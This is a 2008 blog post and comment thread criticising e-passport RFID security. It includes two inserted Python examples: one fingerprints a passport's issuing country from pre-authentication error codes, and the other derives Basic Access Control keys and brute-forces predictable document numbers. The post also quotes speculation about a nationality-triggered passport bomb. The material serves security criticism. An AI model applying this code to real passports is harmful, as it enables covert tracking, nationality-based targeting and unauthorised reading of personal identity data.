April 09, 2008

another way to track their citizens

Passports were always meant to help track citizens. According to lore, they were invented in the 19th century to stop Frenchmen evading the draft (conscription), which is still an issue in some countries. BigMac points to a Dutch working paper, "Fingerprinting Passports," which shows that the RFID chip in a passport can now be used to identify the bearer's country of issue, from a distance of perhaps 25cm. Future Napoleons will be happy.

Because terrorising the reader over breakfast is currently good writing style by governments and media alike, let's highlight the dangers first. The paper speculates:

Given that we can remotely detect the presence of a passport of a particular country, how could this functionality be abused? One abuse case that has been suggested is a passport bomb, designed to go off if someone with a passport of a certain nationality comes close. One could even send such a bomb by post, say to an embassy. A less spectacular, but possibly more realistic, use of this functionality would be by passport thieves, who can remotely check if someone is carrying a passport and if it is of a 'suitable' nationality, before they decide to rob them.

From the general fear department, we can also add that overseas travellers sometimes have a fear of being mugged, kidnapped, hijacked or simply shot because of their mere membership of a favourable or unfavourable country.

Now that we have the FUD off our chest, let's talk details. The trick involves sending a short series of commands (up to four) to the RFID chip in the passport before the access-control handshake has been done; each one is rejected, as it should be. The rejection itself is the leak: the error status word that comes back differs from country to country, so a fingerprint of the issuing country can be formed simply by examining each rejection and then choosing a further command to narrow the remaining choices.
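The narrowing procedure described above, as an added example that is not part of the original post or of the paper: the APDU encodings are real ISO 7816-4 commands, but the per-country status words are constructed for illustration and are not the paper's measurements. The classifier greedily picks, at each step, the command whose responses split the remaining candidate countries into the most groups, sends it, and keeps only the countries consistent with the answer.

```python
"""Fingerprint a passport chip by the status words it returns before BAC.

Country profiles below are CONSTRUCTED for illustration; they are not the
values measured in the "Fingerprinting Passports" paper.
"""
from typing import Callable, Dict, List, Optional, Tuple

# ISO 7816-4 APDUs (real encodings) a reader may send before BAC:
# CLA INS P1 P2 [Lc data] [Le]
PROBES: Dict[str, bytes] = {
    "SELECT EF.COM": bytes.fromhex("00A4020C02011E"),  # select file 011E by FID
    "READ BINARY":   bytes.fromhex("00B0000001"),      # read 1 byte at offset 0
    "GET CHALLENGE": bytes.fromhex("0084000008"),      # 8-byte nonce (BAC step 1)
    "BAD INS":       bytes.fromhex("00FF0000"),        # undefined instruction byte
}

# Hypothetical pre-BAC behaviour per issuer: status word SW1SW2 for each probe.
# 0x6982 security status not satisfied, 0x6986 command not allowed,
# 0x6A82 file not found, 0x6D00 INS not supported, 0x6E00 CLA not supported.
PROFILES: Dict[str, Dict[str, int]] = {
    "Country A": {"SELECT EF.COM": 0x6982, "READ BINARY": 0x6982, "GET CHALLENGE": 0x9000, "BAD INS": 0x6D00},
    "Country B": {"SELECT EF.COM": 0x6A82, "READ BINARY": 0x6982, "GET CHALLENGE": 0x9000, "BAD INS": 0x6D00},
    "Country C": {"SELECT EF.COM": 0x6982, "READ BINARY": 0x6986, "GET CHALLENGE": 0x9000, "BAD INS": 0x6D00},
    "Country D": {"SELECT EF.COM": 0x6982, "READ BINARY": 0x6986, "GET CHALLENGE": 0x9000, "BAD INS": 0x6E00},
    "Country E": {"SELECT EF.COM": 0x6982, "READ BINARY": 0x6986, "GET CHALLENGE": 0x9000, "BAD INS": 0x6E00},
}

Chip = Callable[[bytes], int]  # send one APDU, get back the status word


def simulated_chip(country: str) -> Chip:
    """Stand-in for a real contactless chip: answers from the constructed profile."""
    by_apdu = {PROBES[name]: sw for name, sw in PROFILES[country].items()}
    return lambda apdu: by_apdu[apdu]


def best_probe(candidates: List[str], unused: List[str]) -> Tuple[Optional[str], int]:
    """Pick the unused probe whose status words split the candidates into the most groups.

    Returns (None, 1) when no remaining probe tells the candidates apart.
    """
    best, groups = None, 1
    for name in unused:
        n = len({PROFILES[c][name] for c in candidates})
        if n > groups:
            best, groups = name, n
    return best, groups


def fingerprint(chip: Chip, max_probes: int = 4) -> Tuple[List[str], List[Tuple[str, int]]]:
    """Narrow the issuing country using at most max_probes pre-BAC commands.

    Returns the surviving candidate countries and the (probe, status word) transcript.
    """
    candidates = sorted(PROFILES)
    unused = list(PROBES)
    transcript: List[Tuple[str, int]] = []
    while len(candidates) > 1 and len(transcript) < max_probes:
        name, _ = best_probe(candidates, unused)
        if name is None:  # remaining countries are indistinguishable pre-BAC
            break
        sw = chip(PROBES[name])
        transcript.append((name, sw))
        unused.remove(name)
        candidates = [c for c in candidates if PROFILES[c][name] == sw]
    return candidates, transcript


if __name__ == "__main__":
    for country in PROFILES:
        result, steps = fingerprint(simulated_chip(country))
        print(f"{country}: {result} after {len(steps)} probe(s): "
              + ", ".join(f"{n}->{sw:04X}" for n, sw in steps))
```

Two things the run makes visible that the prose does not: the number of probes needed depends on which country the chip belongs to (a distinctive first answer ends the search immediately), and two issuers whose chips happen to reject identically (Countries D and E here) cannot be separated at all, which is exactly the uniformity a standard should have mandated.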

How did this happen? I would speculate that the root failure is derived from bureaucrats' never-ending appetite for complex technological solutions to simple problems. In this case, the first root cause is the use of the RFID, being by intention and design something that can be read from up to 10 cm.

It is inherently attackable, and therefore by definition a very odd choice for security. The second complexity, then, was implementing something to stop attackers reading the RFID chips without permission. The solution to an active read-off attack is encryption, of course! Which leads to our third complexity, a secret key, which is written inside the passport, of course! (It is derived from the printed machine-readable zone: document number, date of birth and expiry date.) Which immediately raises the issue of brute-forcing (of course!) and, as the paper notes, brute-force attacks work against some countries' passports because the secret key is... poorly chosen: its components, the document number in particular, are far more predictable than the key length suggests.

All of this complexity, er, solution, means something called Basic Access Control (BAC) is added to the RFID chip to enforce the use of the secret key: a set of commands meant to defend the chip. If we factor in the tendency of each country to implement its passports entirely alone (because they are more scared of each other than of their citizens), each solution is proprietary and home-grown. To cope with this, the standard was written to be very flexible (of course!). Hence it permits wide diversity in how errors are reported, and that diversity is the fingerprint.
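The key derivation the two preceding paragraphs describe, written out as an added example (mine, not the post's or the paper's): the BAC keys are derived from the machine-readable zone exactly as ICAO Doc 9303 specifies, using only SHA-1, and the brute-force function shows why predictable document numbers matter. The document number, dates and numbering range used for the brute-force run are constructed; the L898902C / 690806 / 940623 values are the ICAO specification's own worked example. Comparing a candidate key against the target key itself stands in for the real check, which would be against an eavesdropped BAC exchange.

```python
"""ICAO 9303 Basic Access Control key derivation, and a brute force over a
predictable document-number range.  Sample numbers are constructed."""
import hashlib
import math
from typing import Optional, Tuple


def mrz_check_digit(field: str) -> int:
    """ICAO 9303 check digit: weights 7,3,1 over digits, letters (A=10..Z=35) and '<' (=0)."""
    total = 0
    for i, ch in enumerate(field):
        if ch.isdigit():
            v = int(ch)
        elif ch == "<":
            v = 0
        else:
            v = ord(ch.upper()) - ord("A") + 10
        total += v * (7, 3, 1)[i % 3]
    return total % 10


def mrz_information(doc_number: str, birth: str, expiry: str) -> str:
    """The 24-char 'MRZ information' the BAC seed is hashed from:
    document number padded to 9 with '<', then birth and expiry (YYMMDD), each followed by its check digit."""
    doc = doc_number.ljust(9, "<")
    return (f"{doc}{mrz_check_digit(doc)}"
            f"{birth}{mrz_check_digit(birth)}"
            f"{expiry}{mrz_check_digit(expiry)}")


def adjust_parity(key: bytes) -> bytes:
    """Set each byte's low bit so the byte has odd parity (DES key convention)."""
    out = bytearray()
    for b in key:
        high = b & 0xFE
        out.append(high | (1 if bin(high).count("1") % 2 == 0 else 0))
    return bytes(out)


def bac_keys(doc_number: str, birth: str, expiry: str) -> Tuple[bytes, bytes, bytes]:
    """Return (K_seed, K_enc, K_mac), each 16 bytes, per ICAO 9303:
    K_seed = SHA-1(MRZ_information)[:16]; K_enc/K_mac = SHA-1(K_seed || counter)[:16] with counter 1 / 2."""
    info = mrz_information(doc_number, birth, expiry).encode("ascii")
    k_seed = hashlib.sha1(info).digest()[:16]
    k_enc = adjust_parity(hashlib.sha1(k_seed + b"\x00\x00\x00\x01").digest()[:16])
    k_mac = adjust_parity(hashlib.sha1(k_seed + b"\x00\x00\x00\x02").digest()[:16])
    return k_seed, k_enc, k_mac


def keyspace_bits(doc_numbers: int, birth_dates: int, expiry_dates: int) -> float:
    """Effective entropy of the BAC key given how many values each MRZ component can take."""
    return math.log2(doc_numbers * birth_dates * expiry_dates)


def brute_force_document_number(target_k_enc: bytes, birth: str, expiry: str,
                                prefix: str, low: int, high: int, width: int) -> Tuple[Optional[str], int]:
    """Try every document number prefix + zero-padded n for n in [low, high],
    with birth and expiry already known (or guessed).  Returns (number, tries).
    Hypothetical numbering scheme; the match against the key itself stands in
    for checking a candidate against an eavesdropped BAC exchange."""
    tries = 0
    for n in range(low, high + 1):
        tries += 1
        candidate = f"{prefix}{n:0{width}d}"
        if bac_keys(candidate, birth, expiry)[1] == target_k_enc:
            return candidate, tries
    return None, tries


if __name__ == "__main__":
    seed, enc, mac = bac_keys("L898902C", "690806", "940623")  # ICAO 9303 worked example
    print("MRZ info:", mrz_information("L898902C", "690806", "940623"))
    print("K_seed:", seed.hex().upper(), "K_enc:", enc.hex().upper(), "K_mac:", mac.hex().upper())
    # Fully random 9-char alphanumeric number, unknown dates over 100 / 10 years:
    print("random numbering: %.1f bits" % keyspace_bits(36 ** 9, 36500, 3650))
    # Sequential numbers in a known block of a million, dates known:
    print("sequential numbering, dates known: %.1f bits" % keyspace_bits(10 ** 6, 1, 1))
    target = bac_keys("AB012345", "690806", "940623")[1]  # constructed hidden number
    print("recovered:", brute_force_document_number(target, "690806", "940623", "AB", 12000, 12999, 6))
```

The entropy figures are the whole story: a 112-bit 3DES key whose inputs an attacker can mostly predict is no stronger than the few tens of bits of genuine uncertainty left in the document number, and a SHA-1 per candidate is cheap.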

Whoops! Security error. In the world of security, we say that one should be precise in what one sends, and precise in what one returns.

From that point of view, this is poor security work by the governments of the world, but that's to be expected. The US State Department can now derive some satisfaction from its earlier blunders: because its original design omitted any form of encryption or access control, American passports could be read by all (terrorists and borderists alike), which apparently forced it to add aluminium foil into the passport cover to act as a Faraday cage. Likely the other countries will now have to follow suit, and the smugness of being sophisticated and advanced in security terms ("we've got BAC!") will be replaced by a dawning realisation that they should have adopted the simpler solution in the first place.

Posted by iang at April 9, 2008 03:33 AM

This vulnerability in itself can be fatal, which in my opinion constitutes a complete and catastrophic failure.

Posted by: Sam (Cato on fake Id's saving lives) at April 11, 2008 08:02 AM

SSL (and TLS) generally sends client certificates in plaintext, to ensure that every man-in-the-middle knows your identity when you log in somewhere, even if he can't decrypt your traffic.

Posted by: Philipp at April 11, 2008 11:23 AM

I am amazed that this massive scale critical infrastructure project driven by the US was so hastily executed, especially given the relatively long lifetime of these documents (10 years which is an eternity in technology security).

In any case we can already fit multiple kilobytes of data onto paper using standard printing processes (http://en.wikipedia.org/wiki/QR_Code) and almost certainly a lot more using passport printing/engraving technology. That being the case, why go for dangerous RF technology at all, and if you must, why not use a high density barcode to print a secure key?

Also, given the danger I highlighted above (death), how is it possible that the 'front door' is not standardised? Ideally these things would say nothing until authenticated to using (some derivative of) the printed key.

Finally, given the risk of eavesdropping at border control, one would hope that the conversation between the reader and the passport was well secured (for example by leveraging the shared key to set up a session key, or better yet, simply verifying the integrity of the machine-readable content and not transmitting secret data unless absolutely necessary, and even then only ever within the confines of the reader, which one would hope was protected by a Faraday cage or similar).

Posted by: Sam Johnston at April 21, 2008 11:53 AM